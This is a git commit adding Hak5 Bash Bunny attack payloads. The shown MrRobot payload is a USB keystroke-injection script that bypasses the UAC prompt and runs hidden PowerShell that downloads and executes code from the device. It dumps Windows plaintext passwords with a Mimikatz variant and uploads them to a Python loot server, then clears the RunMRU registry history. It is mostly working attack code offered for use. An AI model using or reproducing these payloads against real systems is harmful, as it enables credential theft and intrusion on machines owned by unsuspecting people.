Added browsercreds, wificreds, and mrrobot payloads (#114)

* Initial commit HID Powershell attack to dump WiFiCreds * Update readme.md * changed initial LED blink color to white * Changed initial LED color to white * Changed initial LED Color to white * swapped sync before LED * switched from powershell to batch * Update payload.txt * using powershell again , updated version and LEDs * using powershell, added usb eject, Win 7,8,10 * added window resizing to hide payload typing * Update payload.txt * pull request * BrowserCreds Pull * separate powershell script called from payload also added result detection * update LEDs * Update payload.txt * initial commit * Update payload.txt * initial pull * initial commit
2025-10-29 16:58:25 +00:00 · 2017-04-07 01:48:20 -04:00
parent 741b4a67e5
commit 147a71fe4f
18 changed files with 4019 additions and 0 deletions
--- a/payloads/library/MrRobot/md.ps1
+++ b/payloads/library/MrRobot/md.ps1
--- a/payloads/library/MrRobot/p.ps1
+++ b/payloads/library/MrRobot/p.ps1
@@ -0,0 +1,4 @@
+IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/md.ps1');$o = Invoke-Mimidogz -DumpCred
+(New-Object Net.WebClient).UploadString('http://172.16.64.1/'+$env:computername, $o)
+(New-Object Net.WebClient).UploadString('http://172.16.64.1/EOF', 'EOF');
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
--- a/payloads/library/MrRobot/payload.txt
+++ b/payloads/library/MrRobot/payload.txt
@@ -0,0 +1,76 @@
+#!/bin/bash
+#
+# Title:         MrRobot Mimikatz Attack
+# Author:        illwill
+# Version:       0.2
+#
+# Dumps the usernames & plaintext passwords from Windows boxes using Powershell in memory
+# with Mimikatz then stashes them in /root/udisk/loot/MrRobot
+#
+# Blue...............Running Powershell / Waiting for WebServer to start
+# White..............WebServer started and Uploading Results
+# Purple.............Checking for Results
+# Green..............Got Creds and copied to loot folder
+# Amber(Blinking)....Mimikatz Error (Not Admin?)
+# Red................No Creds
+
+source bunny_helpers.sh
+
+LED R G 200
+# Creating Loot Folders
+LOOTDIR=/root/udisk/loot/MrRobot
+mkdir -p $LOOTDIR
+SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
+mkdir -p $SWITCHDIR/loot
+
+LED B 200
+# HID Attack Starts
+ATTACKMODE HID
+
+# UAC Bypass
+Q GUI r
+Q STRING powershell -c "Start-Process cmd -verb runas"
+Q ENTER
+Q DELAY 1000
+Q LEFTARROW
+Q DELAY 500
+Q ENTER
+Q DELAY 1500
+
+#Powershell Payload: first wait for connection to bunny webserver, then pull scripts and upload results
+Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}\""
+Q DELAY 300
+Q ENTER
+
+
+# Ethernet Attack Starts
+ATTACKMODE RNDIS_ETHERNET
+source bunny_helpers.sh
+
+LED R G B 200
+# mount -o sync /dev/nandf /root/udisk
+
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python $SWITCHDIR/server.py
+
+
+#Wait for EOF in loot folder
+LED R B 200
+while [ ! -e  "$SWITCHDIR/loot/EOF" ]; do sleep 1; done;
+sleep 1
+
+# check for empty loot directory, then check results and move them to loot
+if [ "$(ls -A $SWITCHDIR/loot/)" ]; then
+    if grep -q "ERROR kuhl_m_sekurlsa_acquireLSA" $SWITCHDIR/loot/*.txt; then
+       LED G R 200
+       mv -v $SWITCHDIR/loot/*.txt $LOOTDIR
+       rm -rf $SWITCHDIR/loot/
+    else
+       mv -v $SWITCHDIR/loot/*.txt $LOOTDIR
+       rm -rf $SWITCHDIR/loot/
+       LED G
+    fi
+else
+     rm-rf $SWITCHDIR/loot/
+     LED R
+fi
--- a/payloads/library/MrRobot/readme.md
+++ b/payloads/library/MrRobot/readme.md
@@ -0,0 +1,28 @@
+# MrRobot
+![alt tag](http://i.imgur.com/eunFr0U.jpg)
+* Author: illwill & tuxxy
+* Version: Version 0.2
+* Target: Windows
+
+## Description
+
+Dumps the usernames & plaintext passwords from Windows boxes using Powershell in memory
+with Mimikatz then stashes them in /root/udisk/loot/MrRobot
+
+## Configuration
+
+None needed. 
+
+## STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Blue (blinking)    | Running Powershell / Waiting for WebServer   |
+| White (blinking)   | WebServer started and Uploading Results      |
+| Purple  (blinking) | DChecking for Results                        |
+| Green              | Got Creds and copied to loot folder          |
+| Amber (blinking)   | MimiKatz failed (Not Admin?)                 |
+| Red (blinking)     | No Creds / Mimikatz failed                   |
+
+## Discussion
+[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40524-payload-mrrobot/ "Hak5 Forum Thread")
--- a/payloads/library/MrRobot/server.py
+++ b/payloads/library/MrRobot/server.py
@@ -0,0 +1,60 @@
+import os
+from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
+
+
+IS_RUNNING = True
+abspath = os.path.abspath(__file__)
+CURR_DIR = os.path.dirname(abspath)
+os.chdir(CURR_DIR)
+
+class RequestServer(BaseHTTPRequestHandler):
+    def _set_headers(self):
+        self.send_response(200, "ok")
+        self.send_header('Content-type', 'text/plain')
+        self.protocol_version = 'HTTP/1.1'
+
+    def do_GET(self):
+        self.send_response(200, "ok")
+        self.send_header("Content-type", "text/plain")
+        self.end_headers()
+        try:
+            with open(CURR_DIR + self.path, 'r+') as f:
+                data = f.read()
+            self.wfile.write(data)
+        except IOError:
+            self.send_response(404)
+            self.wfile.write(CURR_DIR)
+            return
+
+    def do_POST(self):
+        global IS_RUNNING
+
+        self.send_response(200)
+        self.send_header("Content-type", "text/plain")
+        self.end_headers()
+        content_length = int(self.headers['Content-Length'])
+        filename = self.path[1:]
+
+        if filename == 'EOF':
+            data = self.rfile.read(content_length)
+            with open(CURR_DIR + "/loot/{}".format(filename), "w+") as f:
+                f.write(data)
+                f.close()
+                self.end_headers()
+                IS_RUNNING = False
+        else:
+            data = self.rfile.read(content_length)
+            with open(CURR_DIR + "/loot/{}.txt".format(filename), "w+") as f:
+                f.write(data)
+                f.close()
+        self._set_headers()
+
+def run(server_class=HTTPServer, handler_class=RequestServer, port=80):
+    server_address = ('', port)
+    httpd = server_class(server_address, handler_class)
+
+    while IS_RUNNING:
+        httpd.handle_request()
+
+if __name__ == '__main__':
+    run()